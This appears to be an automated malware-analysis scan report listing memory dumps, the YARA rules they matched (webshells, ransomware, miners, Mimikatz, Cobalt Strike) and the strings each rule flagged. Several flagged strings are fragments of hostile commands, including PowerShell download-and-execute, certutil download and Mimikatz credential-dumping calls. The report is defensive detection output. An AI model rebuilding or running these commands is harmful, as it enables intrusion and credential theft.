00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x86f1:$asp_much_sus15: antivirus 0xca01:$asp_much_sus37: rootkit 0x386:$asp_gen_obf1: "+" 0x1056:$tagasp_short1: <%g 0xfcd3:$tagasp_short2: %> 0x8b87:$tagasp_classid2: F935DC22-1CF0-11D0-ADB9-00C04FD58A0B 0x10799:$asp_input1: request 0xb98b:$asp_xml_method2: POST 0x4e89:$asp_text1: .text 0xb800:$asp_payload2: eval( 0xb80f:$asp_payload2: eval( 0x8a87:$asp_payload11: wscript.shell 0x935f:$asp_payload11: wscript.shell 0xea6b:$asp_payload11: wscript.shell 0x8a79:$asp_multi_payload_one1: CreateObject 0x9351:$asp_multi_payload_one1: CreateObject 0xb7a6:$asp_multi_payload_one1: createobject 0xea5d:$asp_multi_payload_one1: createobject 0xeff7:$asp_multi_payload_one1: createobject 0xf8c4:$asp_multi_payload_one1: CreateObject 0xc20:$asp_multi_payload_one3: .run
00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	webshell_asp_sql	ASP webshell giving SQL access. Might also be a dual use tool.	Arnim Rupp	0x17d8:$sql3: System 0x17e7:$sql3: System 0x4f16:$sql7: Open 0x500c:$sql7: Open 0x8a79:$o_sql2: CreateObject 0x9351:$o_sql2: CreateObject 0xf8c4:$o_sql2: CreateObject 0x546b:$o_sql3: open 0x54bb:$o_sql3: open 0x870f:$o_sql3: open 0xb785:$o_sql3: open 0xb819:$o_sql3: open 0x8a79:$a_sql3: CreateObject 0x9351:$a_sql3: CreateObject 0xf8c4:$a_sql3: CreateObject 0xb7a6:$a_sql4: createobject 0xea5d:$a_sql4: createobject 0xeff7:$a_sql4: createobject 0x546b:$a_sql5: open 0x54bb:$a_sql5: open 0x870f:$a_sql5: open
00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0x8a87:$s1: wscript.shell").Run 0x935f:$s1: wscript.shell").Run
00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x8d3e:$opbs48: se'.(32*2) 0x443c:$php_short: <? 0x977f:$php_short: <? 0x977f:$php_new2: <?php
00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x8841:$asp_obf2: u"+"n"+"s 0x8b7a:$tagasp_short1: <%e 0x8b91:$tagasp_short2: %> 0x8b7a:$tagasp_long12: <%ex 0x8182:$tagasp_long20: <scriptlanguage="vb 0x981c:$asp_payload2: eval( 0x8264:$asp_payload8: execute( 0x82ae:$asp_payload8: execute( 0x8b2f:$asp_payload8: execute( 0x98b7:$asp_multi_payload_one3: .run 0xa719:$asp_multi_payload_one3: .run 0xbaba:$asp_multi_payload_one3: .run 0x4740:$asp_multi_payload_three2: Process
00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0xa369:$asp_much_sus8: Webshell 0xbfcd:$asp_much_sus8: Webshell 0x8841:$asp_much_sus39: u"+"n"+"s 0x8b8b:$asp_gen_sus10: "cmd" 0x9740:$asp_gen_sus12: %comspec% 0x8102:$asp_gen_obf1: "+" 0x859e:$asp_gen_obf1: "+" 0x85e9:$asp_gen_obf1: "+" 0x85f4:$asp_gen_obf1: "+" 0x85ff:$asp_gen_obf1: "+" 0x8634:$asp_gen_obf1: "+" 0x863f:$asp_gen_obf1: "+" 0x864a:$asp_gen_obf1: "+" 0x867f:$asp_gen_obf1: "+" 0x868a:$asp_gen_obf1: "+" 0x8695:$asp_gen_obf1: "+" 0x86ca:$asp_gen_obf1: "+" 0x86d5:$asp_gen_obf1: "+" 0x86e0:$asp_gen_obf1: "+" 0x8715:$asp_gen_obf1: "+" 0x8720:$asp_gen_obf1: "+"
00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x7e14:$s12: sekurlsa::tickets
00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x7778:$payload_and_input2: execute(request( 0x720b:$tagasp_short1: <%v 0x7776:$tagasp_short1: <%e 0x1d649:$tagasp_short1: <%R 0x35dc0:$tagasp_short1: <%\x03 0x36ae4:$tagasp_short1: <%\xC0 0x64dc:$tagasp_short2: %> 0x778f:$tagasp_short2: %> 0x24f7a:$tagasp_short2: %> 0x7776:$tagasp_long12: <%ex 0xb3c0:$jsp4: public 0xb747:$jsp4: public
00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0xa013:$r2: p^owershell
00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x70bb:$x1: iex ((new-object net.webclient).Download
00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0xa361:$sb1: -w Hidden 0xa10d:$sb3: -windowstyle hidden 0xa102:$sc2: -noprofile 0xa0ea:$se3: -ExecutionPolicy bypass
00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000026.00000003.18354456744.00000138BD776000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xf8b6:$s1: stratum+tcp://
00000026.00000003.18354456744.00000138BD776000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18330858645.00000138BE45C000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x20e11:$opbs73: eval(str_rot13( 0x13334:$php_short: <? 0x236eb:$php_short: <? 0x2a5b5:$php_short: <? 0x3b5b7:$php_short: <? 0x3bb07:$php_short: <? 0x3fc26:$php_short: <? 0x2a5b5:$php_new1: <?=$
00000026.00000003.18330858645.00000138BE45C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18294992845.00000138BE1C8000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Ammyy_Admin_AA_v3	Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe	Florian Roth	0x196f9:$x1: S:\Ammyy\sources\target\TrService.cpp 0x19723:$x2: S:\Ammyy\sources\target\TrDesktopCopyRect.cpp 0x19755:$x3: Global\Ammyy.Target.IncomePort 0x19778:$x4: S:\Ammyy\sources\target\TrFmFileSys.cpp 0x197a4:$x5: Please enter password for accessing remote computer 0x1962f:$s1: CreateProcess1()#3 %d error=%d 0x19652:$s2: CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name. 0x19696:$s3: ERROR: CreateProcessAsUser() error=%d, session=%d 0x196cc:$s4: ERROR: FindProcessByName('explorer.exe')
00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x20e11:$opbs73: eval(str_rot13( 0x13334:$php_short: <? 0x236eb:$php_short: <? 0x2a5b5:$php_short: <? 0x3b5b7:$php_short: <? 0x3bb07:$php_short: <? 0x3fc26:$php_short: <? 0x2a5b5:$php_new1: <?=$
00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18336867211.00000138BDB98000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xb428:$s1: stratum+tcp:// 0xc044:$s1: stratum+tcp://
00000026.00000003.18336867211.00000138BDB98000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2dd0c:$s1: stratum+tcp://
00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1c1ea:$s05: fce8890000006089e531d2648b52308b
00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp	webshell_php_obfuscated_encoding	PHP webshell obfuscated by encoding	Arnim Rupp	0x5d58:$enc_eval1: \x65\x76\x61\x6c\x28 0x5d58:$enc_eval2: \x65\x76\x61\x6c\x28 0x49ce:$php_short: <? 0x4a59:$php_short: <? 0x4ae4:$php_short: <? 0x7ebe:$php_short: <? 0x156b6:$php_short: <? 0x2cda1:$php_short: <? 0x302ca:$php_short: <? 0x312ff:$php_short: <? 0x32aa7:$php_short: <? 0x36243:$php_short: <? 0x32aa7:$php_new2: <?php
00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x32aa7:$new_php2: <?php 0x323b2:$dynamic3: $_server[base64_decode(' 0x4e2c:$gen_bit_sus11: "cmd.exe 0x4eb8:$gen_bit_sus11: "cmd.exe 0x4fcf:$gen_bit_sus11: "cmd.exe 0x7dab:$gen_bit_sus11: "cmd.exe 0x1ed35:$gen_bit_sus47: Shell 0x2a9c3:$gen_bit_sus47: Shell 0x929d:$gen_bit_sus50: bypass 0x3220e:$gen_bit_sus50: bypass 0x32448:$gen_bit_sus59: 'cmd' 0x1dae3:$gen_bit_sus60: "execute" 0x1db1a:$gen_bit_sus60: "execute" 0x1c0ec:$gen_bit_sus62: Cyber 0x1c18c:$gen_bit_sus62: Cyber 0x30c3a:$gen_bit_sus69: $cmd 0x619e:$gen_much_sus8: Webshell 0x25860:$gen_much_sus8: Webshell 0x31279:$gen_much_sus8: WebShell 0x31515:$gen_much_sus8: Webshell 0x323f9:$gen_much_sus8: Webshell
00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x5d58:$opbs77: \x65\x76\x61\x6c\x28 0x49ce:$php_short: <? 0x4a59:$php_short: <? 0x4ae4:$php_short: <? 0x7ebe:$php_short: <? 0x156b6:$php_short: <? 0x2cda1:$php_short: <? 0x302ca:$php_short: <? 0x312ff:$php_short: <? 0x32aa7:$php_short: <? 0x36243:$php_short: <? 0x32aa7:$php_new2: <?php
00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x27f63:$xo1: Ik~mhhe+1*4
00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x1a69:$new_php2: <?php 0x2fdb:$dynamic1: $split[stringlen($ 0x1ffd:$gen_bit_sus11: "cmd.exe 0x17f1:$gen_bit_sus50: bypass 0xb68:$gen_much_sus8: Webshell 0x2b85:$gen_much_sus8: WebShell 0x2bd8:$gen_much_sus8: WebShell 0x17dc:$gen_much_sus15: antivirus 0x58a:$gen_much_sus25: Exploit 0xe4d:$gen_much_sus25: Exploit 0x1136:$gen_much_sus25: Exploit 0x1ce4:$gen_much_sus25: Exploit 0x2119:$gen_much_sus25: Exploit 0x2360:$gen_much_sus25: Exploit 0x2457:$gen_much_sus25: Exploit 0x24aa:$gen_much_sus25: Exploit 0x24fd:$gen_much_sus25: Exploit 0x2550:$gen_much_sus25: Exploit 0x25a3:$gen_much_sus25: Exploit 0x25f6:$gen_much_sus25: Exploit 0x2649:$gen_much_sus25: Exploit
00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x1dfa:$opbs73: eval(str_rot13( 0x98a:$php_short: <? 0x1a69:$php_short: <? 0x98a:$php_new1: <?=$ 0x1a69:$php_new2: <?php
00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0xb68:$asp_much_sus8: Webshell 0x2b85:$asp_much_sus8: WebShell 0x2bd8:$asp_much_sus8: WebShell 0x17dc:$asp_much_sus15: antivirus 0x2b4f:$asp_much_sus33: hacker 0x1ffd:$asp_gen_sus11: "cmd.exe 0x4c2:$asp_gen_obf1: "+" 0x4c9:$asp_gen_obf1: "+" 0x213c:$asp_gen_obf1: "+" 0x2140:$asp_gen_obf1: "+" 0x2145:$asp_gen_obf1: "+" 0x214a:$asp_gen_obf1: "+" 0x214e:$asp_gen_obf1: "+" 0x2152:$asp_gen_obf1: "+" 0x2157:$asp_gen_obf1: "+" 0x16e:$tagasp_short1: <%@ 0x196:$tagasp_short2: %> 0x223f:$asp_input1: request 0x7ac:$asp_text1: .text 0x1833:$asp_text1: .text 0x1dfa:$asp_payload2: eval(
00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18318886682.00000138BE45C000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x20e11:$opbs73: eval(str_rot13( 0x13334:$php_short: <? 0x236eb:$php_short: <? 0x2a5b5:$php_short: <? 0x3b5b7:$php_short: <? 0x3bb07:$php_short: <? 0x3fc26:$php_short: <? 0x2a5b5:$php_new1: <?=$
00000026.00000003.18318886682.00000138BE45C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18322216000.00000138BDE5C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18309314406.00000138BD524000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x5af9:$one6: Shell Environ$("COMSPEC") & " /c
00000026.00000003.18309314406.00000138BD524000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x22977:$s1: stratum+tcp://
00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	JoeSecurity_Niros	Yara detected Niros Ransomware	Joe Security
00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18308141829.00000138BCCD6000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x8d3e:$opbs48: se'.(32*2) 0x443c:$php_short: <? 0x977f:$php_short: <? 0x977f:$php_new2: <?php
00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x8841:$asp_obf2: u"+"n"+"s 0x8b7a:$tagasp_short1: <%e 0x8b91:$tagasp_short2: %> 0x8b7a:$tagasp_long12: <%ex 0x8182:$tagasp_long20: <scriptlanguage="vb 0x981c:$asp_payload2: eval( 0x8264:$asp_payload8: execute( 0x82ae:$asp_payload8: execute( 0x8b2f:$asp_payload8: execute( 0x98b7:$asp_multi_payload_one3: .run 0xa719:$asp_multi_payload_one3: .run 0xbaba:$asp_multi_payload_one3: .run 0x4740:$asp_multi_payload_three2: Process
00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0xa369:$asp_much_sus8: Webshell 0xbfcd:$asp_much_sus8: Webshell 0x8841:$asp_much_sus39: u"+"n"+"s 0x8b8b:$asp_gen_sus10: "cmd" 0x9740:$asp_gen_sus12: %comspec% 0x8102:$asp_gen_obf1: "+" 0x859e:$asp_gen_obf1: "+" 0x85e9:$asp_gen_obf1: "+" 0x85f4:$asp_gen_obf1: "+" 0x85ff:$asp_gen_obf1: "+" 0x8634:$asp_gen_obf1: "+" 0x863f:$asp_gen_obf1: "+" 0x864a:$asp_gen_obf1: "+" 0x867f:$asp_gen_obf1: "+" 0x868a:$asp_gen_obf1: "+" 0x8695:$asp_gen_obf1: "+" 0x86ca:$asp_gen_obf1: "+" 0x86d5:$asp_gen_obf1: "+" 0x86e0:$asp_gen_obf1: "+" 0x8715:$asp_gen_obf1: "+" 0x8720:$asp_gen_obf1: "+"
00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x170e5:$a5: certutil -urlcache -split -f http
00000026.00000003.18357864029.00000138BE774000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x1d676:$pdb1: \ADPassHunt\ 0x1d687:$pdb2: \ADPassHunt.pdb 0x1d69b:$s1: Usage: .\ADPassHunt.exe 0x1d6b7:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x1d6f7:$s3: [ADA] Searching for accounts with userpassword attribute 0x1d734:$s4: [GPP] Searching for passwords now
00000026.00000003.18357864029.00000138BE774000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000026.00000003.18342357735.00000138BDE5C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	webshell_php_base64_encoded_payloads	php webshell containing base64 encoded payload	Arnim Rupp	0x18f0c:$decode1: base64_decode 0x196d3:$decode1: base64_decode 0x197dc:$decode1: base64_decode 0x19829:$decode1: base64_decode 0x19847:$decode1: base64_decode 0x15178:$four1: zeXN0ZW 0x19ea7:$php_short: <? 0x19ea7:$php_new2: <?php
00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x196ce:$payload7: eval(base64_decode( 0x19824:$payload7: eval(base64_decode( 0x19ea7:$php_short: <? 0x19ea7:$php_new2: <?php
00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x19ea7:$new_php2: <?php 0x18aa8:$dynamic1: $_session[md5($ 0x18b12:$dynamic1: $_session[md5($ 0x11850:$gen_bit_sus2: .replace(/y/g 0x23d62:$gen_bit_sus11: "cmd.exe 0x3c882:$gen_bit_sus29: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 0x18d7b:$gen_bit_sus35: crack 0x1967f:$gen_bit_sus46: shell_ 0x19e4e:$gen_bit_sus46: shell_ 0xfe3e:$gen_bit_sus47: Shell 0x17bc4:$gen_bit_sus47: Shell 0x19511:$gen_bit_sus47: Shell 0x304c7:$gen_bit_sus47: Shell 0x12220:$gen_bit_sus50: bypass 0x190f7:$gen_bit_sus50: bypass 0x262e6:$gen_bit_sus50: bypass 0x19f53:$gen_bit_sus60: "execute" 0x19e04:$gen_bit_sus69: $cmd 0x17ccf:$gen_much_sus8: Webshell 0x33510:$gen_much_sus15: antivirus 0x30442:$gen_much_sus16: mcafee
00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	webshell_php_by_string_known_webshell	Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.	Arnim Rupp	0x1a03c:$pbs3: "b374k 0x18a2f:$pbs6: 0de664ecd2be02cdd54234a0d1229b43 0x19ea7:$php_short: <? 0x19ea7:$php_new2: <?php
00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
00000026.00000003.18342844275.00000138BE522000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1431b:$s1: stratum+tcp:// 0x2f54e:$s1: stratum+tcp://
00000026.00000003.18342844275.00000138BE522000.00000004.00000001.sdmp	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
00000026.00000003.18341014844.00000138BCCD6000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x15ba8:$s1: stratum+tcp:// 0x210e7:$s1: stratum+tcp://
00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x3537:$s1: stratum+tcp:// 0x5827:$s1: stratum+tcp://
00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	PUA_CryptoMiner_Jan19_1	Detects Crypto Miner strings	Florian Roth	0x5e64:$s1: Stratum notify: invalid Merkle branch
00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x6be:$x3: lsadump::dcsync
00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x3039d:$s2: system.net.webclient).downloadstring('http
00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x787:$s5: sekurlsa::tspkg 0x744:$s13: sekurlsa::ekeys 0x701:$s14: sekurlsa::dpapi
00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2e9c9:$payload4: eval(gzuncompress(base64_decode 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x240b3:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x7e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x7e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x8af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x8b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	GoldDragon_Aux_File	Detects export from Gold Dragon - February 2018	Florian Roth	0xdbac:$x1: /////////////////////regkeyenum////////////
00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x142f5:$s1: stratum+tcp://
00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0xe2d4:$x1: 78 34 4E 6A 56 63 65 44 63 34 58 48 67 0xe332:$x1: 78 34 4E 7A 68 63 65 44 59 31 58 48 67
00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	CVE_2018_4878_0day_ITW	unknown	unknown	0x16ce5:$known1: f:\work\flash\obfuscation\loadswf\src 0x16ce5:$known5: f:\work\flash\obfuscation\loadswf\src 0x16cc2:$loader3: loadswf 0x16cd3:$loader3: loadswf 0x16cdd:$loader3: loadswf 0x16cff:$loader3: loadswf 0xc73d:$flash_magic: 46 57 53
00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0x3348d:$s1: .CreateObject("WScript.Shell") 0x3571f:$s1: .CreateObject("WScript.Shell") 0x11d0d:$p1: powershell.exe 0x3efff:$p1: powershell.exe
00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	HackTool_Samples	Hacktool	unknown	0xeade:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1e9a0:$s1: stratum+tcp:// 0x1e9cb:$s1: stratum+tcp:// 0x1fd57:$s1: stratum+tcp://
00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
